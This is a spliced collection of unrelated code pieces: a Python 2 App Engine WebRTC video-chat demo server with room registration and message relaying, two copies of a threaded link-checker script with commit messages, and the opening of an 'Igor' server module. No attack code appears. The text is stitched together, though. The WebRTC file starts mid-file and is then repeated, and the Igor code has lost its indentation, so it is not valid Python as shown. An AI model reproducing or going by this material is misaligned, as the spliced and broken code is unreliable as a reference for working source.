    # Preserve the visitor's query parameters across the redirect.
    redirect = append_url_arguments(self.request, redirect)
    self.redirect(redirect)
    logging.info('Redirecting visitor to base URL to ' + redirect)
class RoomPage(webapp2.RequestHandler):
  """Renders the room page (index.html), or full.html when occupied."""

  def write_response(self, target_page, params=None):
    # BUG FIX: the original used a mutable default argument (params={});
    # it is only read here, but shared mutable defaults are a latent bug.
    if params is None:
      params = {}
    template = jinja_environment.get_template(target_page)
    content = template.render(params)
    self.response.out.write(content)

  def get(self, room_id):
    """Renders index.html or full.html."""
    # Check if room is full.
    with LOCK:
      client_map = get_room_client_map(room_id)
      logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
      if len(client_map) >= 2:
        logging.info('Room ' + room_id + ' is full')
        self.write_response('full.html')
        return
    # Parse out room parameters from request.
    params = get_room_parameters(self.request, room_id, None, None)
    self.write_response('index.html', params)
# URL routing table; the '(\w+)' groups capture room_id / client_id path
# segments. NOTE(review): these patterns should be raw strings (r'...') to
# avoid invalid-escape warnings on newer Pythons.
app = webapp2.WSGIApplication([
    ('/', MainPage),
    ('/bye/(\w+)/(\w+)', ByePage),
    ('/message/(\w+)/(\w+)', MessagePage),
    ('/register/(\w+)', RegisterPage),
    # TODO(jiayl): Remove support of /room/ when all clients are updated.
    ('/room/(\w+)', RoomPage),
    ('/r/(\w+)', RoomPage),
  ], debug=True)
# Expanded comments regarding the "it" and "tt" query parameters.
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
"""WebRTC Demo
This module demonstrates the WebRTC API by implementing a simple video chat app.
"""
import cgi
import logging
import os
import random
import re
import json
import jinja2
import threading
import urllib
import webapp2
from google.appengine.api import urlfetch
from google.appengine.ext import db
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Lock for syncing DB operation in concurrent requests handling.
# TODO(brave): keeping working on improving performance with thread syncing.
# One possible method for near future is to reduce the message caching.
LOCK = threading.RLock()
LOOPBACK_CLIENT_ID = 'LOOPBACK_CLIENT_ID'
TURN_BASE_URL = 'https://computeengineondemand.appspot.com'
WSS_HOST = 'apprtc-ws.webrtc.org'
WSS_PORT = '8089'
CEOD_KEY = '4080218913'
def generate_random(length):
  """Returns a random string of |length| decimal digits."""
  return ''.join(random.choice('0123456789') for _ in range(length))
def is_chrome_for_android(user_agent):
  """True when |user_agent| indicates Chrome running on Android."""
  return all(token in user_agent for token in ('Android', 'Chrome'))
# HD is on by default for desktop Chrome, but not Android or Firefox (yet)
def get_hd_default(user_agent):
  """Returns 'true'/'false': whether HD capture should default on."""
  if 'Chrome' in user_agent and 'Android' not in user_agent:
    return 'true'
  return 'false'
# iceServers will be filled in by the TURN HTTP request.
def make_pc_config(ice_transports):
  """Builds the RTCPeerConnection config; iceTransports only when given."""
  if ice_transports:
    return {'iceServers': [], 'iceTransports': ice_transports}
  return {'iceServers': []}
def add_media_track_constraint(track_constraints, constraint_string):
  """Parses one '[mandatory:|optional:]key=value' item into the dict.

  Without a prefix, keys default to mandatory except goog* keys, which
  won't work as mandatory in other browsers. Malformed items are logged
  and dropped.
  """
  tokens = constraint_string.split(':')
  if len(tokens) == 2:
    # Explicit 'mandatory:'/'optional:' prefix decides the bucket.
    mandatory = (tokens[0] == 'mandatory')
  else:
    mandatory = not tokens[0].startswith('goog')
  key_value = tokens[-1].split('=')
  if len(key_value) != 2:
    logging.error('Ignoring malformed constraint: ' + constraint_string)
    return
  key, value = key_value
  if mandatory:
    track_constraints['mandatory'][key] = value
  else:
    track_constraints['optional'].append({key: value})
def make_media_track_constraints(constraints_string):
  """Turns an audio/video query param into gUM track constraints.

  Empty or 'true' -> True; 'false' -> False; otherwise a
  {'mandatory': {...}, 'optional': [...]} dict parsed from the
  comma-separated key=value list.
  """
  lowered = constraints_string.lower() if constraints_string else ''
  if not constraints_string or lowered == 'true':
    return True
  if lowered == 'false':
    return False
  track_constraints = {'mandatory': {}, 'optional': []}
  for item in constraints_string.split(','):
    add_media_track_constraint(track_constraints, item)
  return track_constraints
def make_media_stream_constraints(audio, video, firefox_fake_device):
  # Builds the getUserMedia stream constraints from the audio/video params.
  stream_constraints = (
      {'audio': make_media_track_constraints(audio),
       'video': make_media_track_constraints(video)})
  if firefox_fake_device:
    # Firefox substitutes a built-in fake capture device when fake is True.
    stream_constraints['fake'] = True
  logging.info('Applying media constraints: ' + str(stream_constraints))
  return stream_constraints
def maybe_add_constraint(constraints, param, constraint):
  # Appends {constraint: True/False} to constraints['optional'] when |param|
  # is the string 'true'/'false' (case-insensitive); any other value is a
  # no-op. Returns the (possibly mutated) constraints dict.
  if (param.lower() == 'true'):
    constraints['optional'].append({constraint: True})
  elif (param.lower() == 'false'):
    constraints['optional'].append({constraint: False})
  return constraints
def make_pc_constraints(dtls, dscp, ipv6):
  # Builds RTCPeerConnection constraints from the dtls/dscp/ipv6 params.
  constraints = { 'optional': [] }
  # Force on the new BWE in Chrome 35 and later.
  # TODO(juberti): Remove once Chrome 36 is stable.
  constraints['optional'].append({'googImprovedWifiBwe': True})
  maybe_add_constraint(constraints, dtls, 'DtlsSrtpKeyAgreement')
  maybe_add_constraint(constraints, dscp, 'googDscp')
  maybe_add_constraint(constraints, ipv6, 'googIPv6')
  return constraints
def make_offer_constraints():
  # Constraints used when creating the SDP offer; currently empty.
  constraints = { 'mandatory': {}, 'optional': [] }
  return constraints
# Re-appends the request's query parameters onto |link| as an escaped query
# string, so redirects and room links preserve the caller's options.
# NOTE(review): cgi.escape HTML-escapes rather than URL-encodes, and was
# removed in Python 3.8 — presumably acceptable for this Python 2 GAE app,
# but confirm before porting.
def append_url_arguments(request, link):
  arguments = request.arguments()
  if len(arguments) == 0:
    return link
  # First argument starts the query string with '?'; the rest use '&'.
  link += ('?' + cgi.escape(arguments[0], True) + '=' +
           cgi.escape(request.get(arguments[0]), True))
  for argument in arguments[1:]:
    link += ('&' + cgi.escape(argument, True) + '=' +
             cgi.escape(request.get(argument), True))
  return link
def get_wss_parameters(request):
  # Returns (wss_url, wss_post_url) for the collider signaling server.
  # wsh/wsp/wstls query params override host, port and TLS; TLS is on
  # unless wstls is explicitly 'false'.
  ws_host = request.get('wsh')
  ws_port = request.get('wsp')
  ws_tls = request.get('wstls')
  if not ws_host:
    ws_host = WSS_HOST
  if not ws_port:
    ws_port = WSS_PORT
  if ws_tls and ws_tls == 'false':
    wss_url = 'ws://' + ws_host + ':' + ws_port + '/ws'
    wss_post_url = 'http://' + ws_host + ':' + ws_port
  else:
    wss_url = 'wss://' + ws_host + ':' + ws_port + '/ws'
    wss_post_url = 'https://' + ws_host + ':' + ws_port
  return (wss_url, wss_post_url)
# Returns appropriate room parameters based on query parameters in the request.
# TODO(tkchin): move query parameter parsing to JS code.
def get_room_parameters(request, room_id, client_id, is_initiator):
  """Builds the template/JSON parameter dict for a room.

  Args:
    request: the webapp2 request; query parameters control call behavior.
    room_id: string room identifier.
    client_id: registered client id, or None on the initial page load.
    is_initiator: whether this client initiates the call, or None.

  Returns:
    Dict of parameters consumed by the JS client and HTML templates.
  """
  error_messages = []
  user_agent = request.headers['User-Agent']
  # Which ICE candidates to allow. This is useful for forcing a call to run
  # over TURN, by setting it=relay.
  ice_transports = request.get('it')
  # Which TURN transport= to allow (i.e., only TURN URLs with transport=<tt>
  # will be used). This is useful for forcing a session to use TURN/TCP, by
  # setting it=relay&tt=tcp.
  turn_transports = request.get('tt')
  # A HTTP server that will be used to find the right TURN servers to use, as
  # described in http://tools.ietf.org/html/draft-uberti-rtcweb-turn-rest-00.
  turn_base_url = request.get('ts', default_value=TURN_BASE_URL)
  # "audio"/"video" set the media stream constraints (http://goo.gl/V7cZg).
  # "true"/"false" are interpreted as bools; otherwise a comma-separated list
  # of key=value pairs, each optionally prefixed with "mandatory:" or
  # "optional:" (goog* keys default to optional, others to mandatory).
  audio = request.get('audio')
  video = request.get('video')
  # Pass firefox_fake_device=1 to pass fake: true in the media constraints,
  # which will make Firefox use its built-in fake device.
  firefox_fake_device = request.get('firefox_fake_device')
  # "hd" is shorthand for opening the camera at 720p. With no value, use a
  # platform-specific default; when defaulting to HD use optional
  # constraints, in case the camera doesn't actually support HD modes.
  hd = request.get('hd').lower()
  if hd and video:
    message = 'The "hd" parameter has overridden video=' + video
    logging.error(message)
    error_messages.append(message)
  if hd == 'true':
    video = 'mandatory:minWidth=1280,mandatory:minHeight=720'
  elif not hd and not video and get_hd_default(user_agent) == 'true':
    video = 'optional:minWidth=1280,optional:minHeight=720'
  if request.get('minre') or request.get('maxre'):
    message = ('The "minre" and "maxre" parameters are no longer supported. '
               'Use "video" instead.')
    logging.error(message)
    error_messages.append(message)
  # Allow preferred audio and video codecs to be overridden.
  audio_send_codec = request.get('asc', default_value='')
  audio_receive_codec = request.get('arc', default_value='')
  video_send_codec = request.get('vsc', default_value='')
  video_receive_codec = request.get('vrc', default_value='')
  # Stereo, Opus FEC and Opus max sample rate toggles.
  stereo = request.get('stereo', default_value='')
  opusfec = request.get('opusfec', default_value='')
  opusmaxpbr = request.get('opusmaxpbr', default_value='')
  # Audio/video send & receive bitrates, plus the initial video send bitrate.
  asbr = request.get('asbr', default_value='')
  arbr = request.get('arbr', default_value='')
  vsbr = request.get('vsbr', default_value='')
  vrbr = request.get('vrbr', default_value='')
  vsibr = request.get('vsibr', default_value='')
  # Options for controlling various networking features.
  dtls = request.get('dtls')
  dscp = request.get('dscp')
  ipv6 = request.get('ipv6')
  # Stereoscopic rendering: remote video is a side-by-side view of two
  # cameras' captures, each fed to one eye. Avoid pulling down vr.js
  # (>25KB, minified) if not needed.
  ssr = request.get('ssr')
  include_vr_js = ''
  if ssr == 'true':
    include_vr_js = ('<script src="/js/vr.js"></script>\n' +
                     '<script src="/js/stereoscopic.js"></script>')
  debug = request.get('debug')
  if debug == 'loopback':
    # Set dtls to false as DTLS does not work for loopback.
    dtls = 'false'
    include_loopback_js = '<script src="/js/loopback.js"></script>'
  else:
    include_loopback_js = ''
  # TODO(tkchin): We want to provide a TURN request url on the initial get,
  # but we don't provide client_id until a register. For now just generate
  # a random id, but we should make this better.
  username = client_id if client_id is not None else generate_random(9)
  # BUG FIX: the original split the '%' operator from its operand tuple
  # across two unparenthesized lines (a SyntaxError) and left turn_url
  # unbound whenever turn_base_url was empty. Always bind turn_url.
  turn_url = ''
  if len(turn_base_url) > 0:
    turn_url = '%s/turn?username=%s&key=%s' % (
        turn_base_url, username, CEOD_KEY)
  room_link = request.host_url + '/room/' + room_id
  room_link = append_url_arguments(request, room_link)
  pc_config = make_pc_config(ice_transports)
  pc_constraints = make_pc_constraints(dtls, dscp, ipv6)
  offer_constraints = make_offer_constraints()
  media_constraints = make_media_stream_constraints(audio, video,
                                                    firefox_fake_device)
  wss_url, wss_post_url = get_wss_parameters(request)
  params = {
    'error_messages': error_messages,
    'is_loopback': json.dumps(debug == 'loopback'),
    'room_id': room_id,
    'room_link': room_link,
    'pc_config': json.dumps(pc_config),
    'pc_constraints': json.dumps(pc_constraints),
    'offer_constraints': json.dumps(offer_constraints),
    'media_constraints': json.dumps(media_constraints),
    'turn_url': turn_url,
    'turn_transports': turn_transports,
    'stereo': stereo,
    'opusfec': opusfec,
    'opusmaxpbr': opusmaxpbr,
    'arbr': arbr,
    'asbr': asbr,
    'vrbr': vrbr,
    'vsbr': vsbr,
    'vsibr': vsibr,
    'audio_send_codec': audio_send_codec,
    'audio_receive_codec': audio_receive_codec,
    'video_send_codec': video_send_codec,
    'video_receive_codec': video_receive_codec,
    'ssr': ssr,
    'include_loopback_js': include_loopback_js,
    'include_vr_js': include_vr_js,
    'wss_url': wss_url,
    'wss_post_url': wss_post_url
  }
  if client_id is not None:
    params['client_id'] = client_id
  if is_initiator is not None:
    params['is_initiator'] = json.dumps(is_initiator)
  return params
# For now we have (room_id, client_id) pairs are 'unique' but client_ids are
# not. Uniqueness is not enforced however and bad things may happen if RNG
# generates non-unique numbers. We also have a special loopback client id.
# TODO(tkchin): Generate room/client IDs in a unique way while handling
# loopback scenario correctly.
class Client(db.Model):
  # Datastore record for one participant in a room.
  room_id = db.StringProperty()        # room this client belongs to
  client_id = db.StringProperty()      # random id assigned at register time
  messages = db.ListProperty(db.Text)  # messages queued until a peer joins
  is_initiator = db.BooleanProperty()  # whether this client starts the call
# Constructs the db key for the room. We use this key to create entity groups
# for clients in the same room, so that clients in the same room will be
# strongly consistent.
def get_room_key(room_id):
  # Key path is ('Room', room_id); used as the parent for Client entities.
  return db.Key.from_path('Room', room_id)
# Creates a new Client db object and adds it to |client_map|.
def add_client(client_map, room_id, client_id, messages, is_initiator):
  room_key = get_room_key(room_id)
  # parent=room_key places the client in the room's entity group so reads
  # within a room are strongly consistent.
  client = Client(room_id=room_id,
                  client_id=client_id,
                  messages=messages,
                  is_initiator=is_initiator,
                  parent=room_key)
  client.put()
  client_map[client_id] = client
  logging.info('Added client ' + client_id + ' in room ' + room_id)
# Removes a client from |client_map| and the datastore.
def remove_client(client_map, client_id):
  # Raises KeyError if client_id is absent; callers check membership first.
  client = client_map.pop(client_id)
  client.delete()
# Returns clients for room.
def get_room_clients(room_id):
  """Queries all Client entities in |room_id|'s entity group.

  BUG FIX: the GQL string read 'ANCESTOR IS:ancestor' — the missing space
  between the IS keyword and the :ancestor binding is not valid GQL.
  """
  room_key = get_room_key(room_id)
  return Client.gql('WHERE ANCESTOR IS :ancestor AND room_id = :rid',
                    ancestor=room_key, rid=room_id)
# Returns dictionary of client_id to Client.
def get_room_client_map(room_id):
  clients = get_room_clients(room_id)
  client_map = {}
  for client in clients:
    # Sometimes datastore converts to unicode string. This converts it back
    # to match string coming in from request handlers.
    client_map[str(client.client_id)] = client
  return client_map
class ByePage(webapp2.RequestHandler):
  """Handles /bye/<room_id>/<client_id>: a client leaving a room."""

  def post(self, room_id, client_id):
    # Removes |client_id| (and any loopback client) from the room, then
    # promotes the remaining client, if any, to initiator.
    with LOCK:
      client_map = get_room_client_map(room_id)
      if len(client_map) == 0:
        logging.warning('Unknown room: ' + room_id)
        return
      if client_id not in client_map:
        logging.warning('Unknown client ' + client_id + ' for room ' + room_id)
        return
      remove_client(client_map, client_id)
      logging.info('Removed client ' + client_id + ' from room ' + room_id)
      if LOOPBACK_CLIENT_ID in client_map:
        remove_client(client_map, LOOPBACK_CLIENT_ID)
        logging.info('Removed loopback client from room ' + room_id)
      if len(client_map) > 0:
        other_client = client_map.values()[0]
        # Set other client to be new initiator.
        other_client.is_initiator = True
        # This should already be empty, but set it anyway.
        other_client.messages = []
        # Commit changes.
        other_client.put()
      logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MessagePage(webapp2.RequestHandler):
  """Handles /message/<room_id>/<client_id>: relays or stores signaling."""

  def write_response(self, result):
    # Replies with a JSON body of the form {"result": <result>}.
    content = json.dumps({ 'result' : result })
    self.response.write(content)

  def send_message_to_collider(self, room_id, client_id, message):
    # POSTs |message| to the collider (WebSocket signaling) server.
    logging.info('Forwarding message to collider for room ' + room_id +
                 ' client ' + client_id)
    wss_url, wss_post_url = get_wss_parameters(self.request)
    url = wss_post_url + '/' + room_id + '/' + client_id
    result = urlfetch.fetch(url=url,
                            payload=message,
                            method=urlfetch.POST)
    if result.status_code != 200:
      logging.error(
          'Failed to send message to collider: %d' % (result.status_code))
      # TODO(tkchin): better error handling.
      self.error(500)
      return
    self.write_response('SUCCESS')

  def post(self, room_id, client_id):
    message_json = self.request.body
    with LOCK:
      client_map = get_room_client_map(room_id)
      occupancy = len(client_map)
      # Check that room exists.
      if occupancy == 0:
        logging.warning('Unknown room: ' + room_id)
        self.write_response('UNKNOWN_ROOM')
        return
      # Check that client is registered.
      if not client_id in client_map:
        logging.warning('Unknown client: ' + client_id)
        self.write_response('UNKNOWN_CLIENT')
        return
      # Check if other client is registered.
      if occupancy == 1:
        # No other client registered: queue the message until a peer joins.
        logging.info('Saving message from client ' + client_id +
                     ' for room ' + room_id)
        client = client_map[client_id]
        text = db.Text(message_json, encoding='utf-8')
        client.messages.append(text)
        client.put()
        self.write_response('SUCCESS')
        return
    # Other client registered, forward to collider. Do this outside the lock.
    # Note: this may fail in local dev server due to not having the right
    # certificate file locally for SSL validation.
    # Note: loopback scenario follows this code path.
    # TODO(tkchin): consider async fetch here.
    self.send_message_to_collider(room_id, client_id, message_json)
class RegisterPage(webapp2.RequestHandler):
  """Handles /register/<room_id>: joins (or creates) a room."""

  def write_response(self, result, params, messages):
    # TODO(tkchin): Clean up response format. For simplicity put everything in
    # params for now.
    params['messages'] = messages
    self.response.write(json.dumps({
      'result': result,
      'params': params
    }))

  def write_room_parameters(self, room_id, client_id, messages, is_initiator):
    # Responds with SUCCESS plus the full room parameter set.
    params = get_room_parameters(self.request, room_id, client_id, is_initiator)
    self.write_response('SUCCESS', params, messages)

  def post(self, room_id):
    client_id = generate_random(8)
    is_loopback = self.request.get('debug') == 'loopback'
    is_initiator = False
    messages = []
    params = {}
    with LOCK:
      client_map = get_room_client_map(room_id)
      occupancy = len(client_map)
      if occupancy == 0:
        # New room: create first client as initiator (plus a loopback peer
        # when debugging in loopback mode).
        is_initiator = True
        add_client(client_map, room_id, client_id, messages, is_initiator)
        if is_loopback:
          add_client(
              client_map, room_id, LOOPBACK_CLIENT_ID, messages, False)
        # Write room parameters response.
        self.write_room_parameters(room_id, client_id, messages, is_initiator)
      elif occupancy == 1:
        # Retrieve stored messages from first client.
        other_client = client_map.values()[0]
        messages = other_client.messages
        # Create second client as not initiator.
        is_initiator = False
        add_client(client_map, room_id, client_id, [], is_initiator)
        # Write room parameters response with any messages.
        self.write_room_parameters(room_id, client_id, messages, is_initiator)
        # Delete the messages we've responded with.
        other_client.messages = []
        other_client.put()
      elif occupancy >= 2:
        # Full room.
        logging.info('Room ' + room_id + ' is full.')
        self.write_response('FULL', params, messages)
        return
    logging.info('User ' + client_id + ' registered in room ' + room_id)
    logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MainPage(webapp2.RequestHandler):
  """Handles '/': sends the visitor to a freshly generated room."""

  def get(self):
    """Redirects to a room page."""
    room_id = generate_random(8)
    redirect = '/r/' + room_id
    # Preserve the visitor's query parameters across the redirect.
    redirect = append_url_arguments(self.request, redirect)
    self.redirect(redirect)
    logging.info('Redirecting visitor to base URL to ' + redirect)
class RoomPage(webapp2.RequestHandler):
  """Renders the room page (index.html), or full.html when occupied."""

  def write_response(self, target_page, params=None):
    # BUG FIX: the original used a mutable default argument (params={});
    # it is only read here, but shared mutable defaults are a latent bug.
    if params is None:
      params = {}
    template = jinja_environment.get_template(target_page)
    content = template.render(params)
    self.response.out.write(content)

  def get(self, room_id):
    """Renders index.html or full.html."""
    # Check if room is full.
    with LOCK:
      client_map = get_room_client_map(room_id)
      logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
      if len(client_map) >= 2:
        logging.info('Room ' + room_id + ' is full')
        self.write_response('full.html')
        return
    # Parse out room parameters from request.
    params = get_room_parameters(self.request, room_id, None, None)
    self.write_response('index.html', params)
# URL routing table. Route patterns are raw strings so the `\w` escapes
# are passed to the regex engine verbatim (non-raw '\w' is a deprecated
# string escape in modern Python, though it produces the same bytes).
app = webapp2.WSGIApplication([
    ('/', MainPage),
    (r'/bye/(\w+)/(\w+)', ByePage),
    (r'/message/(\w+)/(\w+)', MessagePage),
    (r'/register/(\w+)', RegisterPage),
    # TODO(jiayl): Remove support of /room/ when all clients are updated.
    (r'/room/(\w+)', RoomPage),
    (r'/r/(\w+)', RoomPage),
], debug=True)
|
#!/usr/bin/env python3
import os
import sys
import http.server
from threading import Event, Thread, Condition, \
BoundedSemaphore
from contextlib import suppress
from urllib.parse import urljoin, urlsplit
import requests
from lxml import etree
from lxml.cssselect import CSSSelector
DEBUG = False
class LinkChecker(object):
    """Multi-threaded crawler that records the HTTP status of every link
    reachable from the start URLs, recursing only within their hosts."""

    def __init__(self, start_urls):
        # urls are SCHEME://NETLOC/PATH
        # Only pages on these hosts are parsed for further links.
        self.recursive_netlocs = set(urlsplit(u).netloc for u in start_urls)
        # key: url, value: referers
        self.referers = dict((u, set(['commandline'])) for u in start_urls)
        # key: url, value: http response code
        self.visited = dict()
        self.queued = set(start_urls)
        self.ignored = set()
        # Condition variable guarding queued/visited/referers and the
        # `waiting` counter below.
        self.cv = Condition()
        self.waiting = 0
        self.num_workers = 0
        # Set once every worker is simultaneously idle => crawl complete.
        self.done = Event()

    def link_extractor(self, html, url):
        # Return the set of URLs found in <img src/data-src> and <a href>
        # of the parsed document, resolved absolute against `url`.
        img_selector = CSSSelector('img')
        a_selector = CSSSelector('a')

        def urls_generator():
            for img in img_selector(html):
                with suppress(KeyError):
                    yield urljoin(url, img.attrib['src'])
                with suppress(KeyError):
                    yield urljoin(url, img.attrib['data-src'])
            for a in a_selector(html):
                with suppress(KeyError):
                    yield urljoin(url, a.attrib['href'])

        return set(urls_generator())

    def process_queued_urls(self, idx):
        # Worker loop: pop a URL, fetch it, record its status, and enqueue
        # any newly discovered links. Termination protocol: a worker that
        # finds the queue empty increments `waiting`; when all workers are
        # waiting at once, the crawl is finished and everyone is woken.
        id = "Thread {}:".format(idx)
        while True:
            with self.cv:
                try:
                    url = self.queued.pop()
                except KeyError:
                    if DEBUG:
                        print(id, "waiting...")
                    self.waiting += 1
                    if self.num_workers == self.waiting:
                        # every thread is waiting => done
                        self.done.set()
                        self.cv.notify_all()
                        if DEBUG:
                            print(id, "done")
                        return
                    else:
                        self.cv.wait()
                        # Woken by new work or by completion; if done, the
                        # next pop fails again and we exit via the branch
                        # above.
                        self.waiting -= 1
                        continue
            if DEBUG:
                print(id, url)
            # Fetch outside the lock so the other workers keep running.
            r = requests.get(url)
            with self.cv:
                self.visited[url] = r.status_code
                if r.status_code == 200 and \
                   r.headers['content-type'].startswith('text/html') and \
                   urlsplit(url).netloc in self.recursive_netlocs:
                    for found_url in self.link_extractor(etree.HTML(r.content), url):
                        if urlsplit(found_url).scheme not in ['http', 'https']:
                            continue
                        try:
                            self.referers[found_url].add(url)
                            # no KeyError? => we've already seen this one
                        except KeyError:
                            self.referers[found_url] = set([url])
                            self.queued.add(found_url)
                            self.cv.notify()

    def run(self, num_workers):
        # Start the worker threads and block until the crawl finishes.
        threadpool = [Thread(target=self.process_queued_urls, args=(i,), daemon=False)
                      for i in range(num_workers)]
        self.waiting = 0
        self.num_workers = num_workers
        self.done.clear()
        [t.start() for t in threadpool]
        [t.join() for t in threadpool]
if __name__ == '__main__':
    urls = sys.argv[1:]
    local_server_thread = None
    if len(urls) == 0:
        # No URLs given: serve the current directory over a local HTTP
        # server and check every file found in it.
        print('checking links in files found in current directory')
        for r, _, files in os.walk('.'):
            for f in files:
                f = os.path.join(r, f)
                if f.startswith('./'):
                    f = f[2:]
                if f.endswith('index.html'):
                    f = f[:-len('index.html')]
                urls.append('http://127.0.0.1:8000/' + f)
        # Fix: daemon=True so the process can exit once the crawl is done.
        # http.server.test() serves forever; a non-daemon thread running it
        # would keep the interpreter alive indefinitely.
        local_server_thread = Thread(
            target=lambda: http.server.test(
                HandlerClass=http.server.SimpleHTTPRequestHandler,
                bind="127.0.0.1"
            ),
            daemon=True
        )
        local_server_thread.start()
    link_checker = LinkChecker(urls)
    # Multi-threaded crawling works fine against the local server as well.
    link_checker.run(10)
    print("checked {} urls, {} returned errors.".format(
        len(link_checker.visited),
        [code >= 400 for code in link_checker.visited.values()].count(True)
    ))
    for url, code in sorted(link_checker.visited.items(), key=lambda e: e[0]):
        if code >= 400:
            print("{}: {}\nFound on:".format(code, url))
            for ref in link_checker.referers[url]:
                print(" {}".format(ref))
    if any(code >= 400 for code in link_checker.visited.values()):
        sys.exit(1)
use a daemon thread for the internal http server + enable multithreading again
link_checker.py never exits when a non-daemon thread is handling the internal webserver used to find dead links in files.
I thought multithreading was a problem, but it turns out it's not. That's why it's enabled in all cases again.
#!/usr/bin/env python3
import os
import sys
import http.server
from threading import Event, Thread, Condition, \
BoundedSemaphore
from contextlib import suppress
from urllib.parse import urljoin, urlsplit
import requests
from lxml import etree
from lxml.cssselect import CSSSelector
DEBUG = False
class LinkChecker(object):
    """Multi-threaded crawler that records the HTTP status of every link
    reachable from the start URLs, recursing only within their hosts."""

    def __init__(self, start_urls):
        # urls are SCHEME://NETLOC/PATH
        # Only pages on these hosts are parsed for further links.
        self.recursive_netlocs = set(urlsplit(u).netloc for u in start_urls)
        # key: url, value: referers
        self.referers = dict((u, set(['commandline'])) for u in start_urls)
        # key: url, value: http response code
        self.visited = dict()
        self.queued = set(start_urls)
        self.ignored = set()
        # Condition variable guarding queued/visited/referers and the
        # `waiting` counter below.
        self.cv = Condition()
        self.waiting = 0
        self.num_workers = 0
        # Set once every worker is simultaneously idle => crawl complete.
        self.done = Event()

    def link_extractor(self, html, url):
        # Return the set of URLs found in <img src/data-src> and <a href>
        # of the parsed document, resolved absolute against `url`.
        img_selector = CSSSelector('img')
        a_selector = CSSSelector('a')

        def urls_generator():
            for img in img_selector(html):
                with suppress(KeyError):
                    yield urljoin(url, img.attrib['src'])
                with suppress(KeyError):
                    yield urljoin(url, img.attrib['data-src'])
            for a in a_selector(html):
                with suppress(KeyError):
                    yield urljoin(url, a.attrib['href'])

        return set(urls_generator())

    def process_queued_urls(self, idx):
        # Worker loop: pop a URL, fetch it, record its status, and enqueue
        # any newly discovered links. Termination protocol: a worker that
        # finds the queue empty increments `waiting`; when all workers are
        # waiting at once, the crawl is finished and everyone is woken.
        id = "Thread {}:".format(idx)
        while True:
            with self.cv:
                try:
                    url = self.queued.pop()
                except KeyError:
                    if DEBUG:
                        print(id, "waiting...")
                    self.waiting += 1
                    if self.num_workers == self.waiting:
                        # every thread is waiting => done
                        self.done.set()
                        self.cv.notify_all()
                        if DEBUG:
                            print(id, "done")
                        return
                    else:
                        self.cv.wait()
                        # Woken by new work or by completion; if done, the
                        # next pop fails again and we exit via the branch
                        # above.
                        self.waiting -= 1
                        continue
            if DEBUG:
                print(id, url)
            # Fetch outside the lock so the other workers keep running.
            r = requests.get(url)
            with self.cv:
                self.visited[url] = r.status_code
                if r.status_code == 200 and \
                   r.headers['content-type'].startswith('text/html') and \
                   urlsplit(url).netloc in self.recursive_netlocs:
                    for found_url in self.link_extractor(etree.HTML(r.content), url):
                        if urlsplit(found_url).scheme not in ['http', 'https']:
                            continue
                        try:
                            self.referers[found_url].add(url)
                            # no KeyError? => we've already seen this one
                        except KeyError:
                            self.referers[found_url] = set([url])
                            self.queued.add(found_url)
                            self.cv.notify()

    def run(self, num_workers):
        # Start the worker threads and block until the crawl finishes.
        threadpool = [Thread(target=self.process_queued_urls, args=(i,), daemon=False)
                      for i in range(num_workers)]
        self.waiting = 0
        self.num_workers = num_workers
        self.done.clear()
        [t.start() for t in threadpool]
        [t.join() for t in threadpool]
if __name__ == '__main__':
    urls = sys.argv[1:]
    local_server_thread = None
    if len(urls) == 0:
        # No URLs given: serve the current directory over a local HTTP
        # server and check every file found in it.
        print('checking links in files found in current directory')
        for r, _, files in os.walk('.'):
            for f in files:
                f = os.path.join(r, f)
                if f.startswith('./'):
                    f = f[2:]
                if f.endswith('index.html'):
                    f = f[:-len('index.html')]
                urls.append('http://127.0.0.1:8000/' + f)
        # daemon=True so the process can exit once the crawl is done:
        # http.server.test() serves forever and a non-daemon thread
        # running it would keep the interpreter alive indefinitely.
        local_server_thread = Thread(
            target=lambda: http.server.test(
                HandlerClass=http.server.SimpleHTTPRequestHandler,
                bind="127.0.0.1"
            ),
            daemon=True
        )
        local_server_thread.start()
    link_checker = LinkChecker(urls)
    link_checker.run(10)
    print("checked {} urls, {} returned errors.".format(
        len(link_checker.visited),
        [code >= 400 for code in link_checker.visited.values()].count(True)
    ))
    for url, code in sorted(link_checker.visited.items(), key=lambda e: e[0]):
        if code >= 400:
            print("{}: {}\nFound on:".format(code, url))
            for ref in link_checker.referers[url]:
                print(" {}".format(ref))
    # Non-zero exit status when any checked URL returned an error.
    if any(code >= 400 for code in link_checker.visited.values()):
        sys.exit(1)
|
make load generator configurable for perf test (#879)
* make load generator configurable for perf test
* extract gen_test_labels gen_headers_cmd and gen_fortio_cmd funcs
* make func name much more readable
* remove never used rc() func
* move up kubectl related helpers
* move duration to fortio cmd func
* fix lint error
|
import webApp
import xmlDatabase
import actions
import sseListener
import callUrl
import os
import argparse
import besthostname
import time
import json
import web
import subprocess
import imp
import threading
import cProfile
import pstats
import myLogger
from _version import VERSION
import sys
reload(sys)
sys.setdefaultencoding('utf8')
#
# Helper for profileing multiple threads
#
PROFILER_STATS = None
def enable_thread_profiling():
'''Monkey-patch Thread.run to enable global profiling.
Each thread creates a local profiler; statistics are pooled
to the global stats object on run completion.'''
global PROFILER_STATS
import pstats
PROFILER_STATS = None
thread_run = threading.Thread.run
def profile_run(self):
print 'xxxjack profile_run'
self._prof = cProfile.Profile()
self._prof.enable()
thread_run(self)
self._prof.disable()
if PROFILER_STATS is None:
PROFILER_STATS = pstats.Stats(self._prof)
else:
PROFILER_STATS.add(self._prof)
threading.Thread.run = profile_run
print 'xxxjack inserted profiler'
class IgorServer:
def __init__(self, datadir, port=9333, advertise=False, profile=False):
#
# Create the database, and tell the web application about it
#
self.profile = None
if profile:
enable_thread_profiling()
self.profile = cProfile.Profile()
self.profile.enable()
self.port = port
self.app = webApp.WEBAPP
self.datadir = datadir
self.database = xmlDatabase.DBImpl(os.path.join(self.datadir, 'database.xml'))
webApp.DATABASE = self.database # Have to set in a module-global variable, to be fixed some time...
webApp.SCRIPTDIR = os.path.join(datadir, 'scripts')
webApp.PLUGINDIR = os.path.join(datadir, 'plugins')
webApp.STATICDIR = os.path.join(datadir, 'static')
webApp.COMMANDS = self
#
# Create and start the asynchronous URL accessor
#
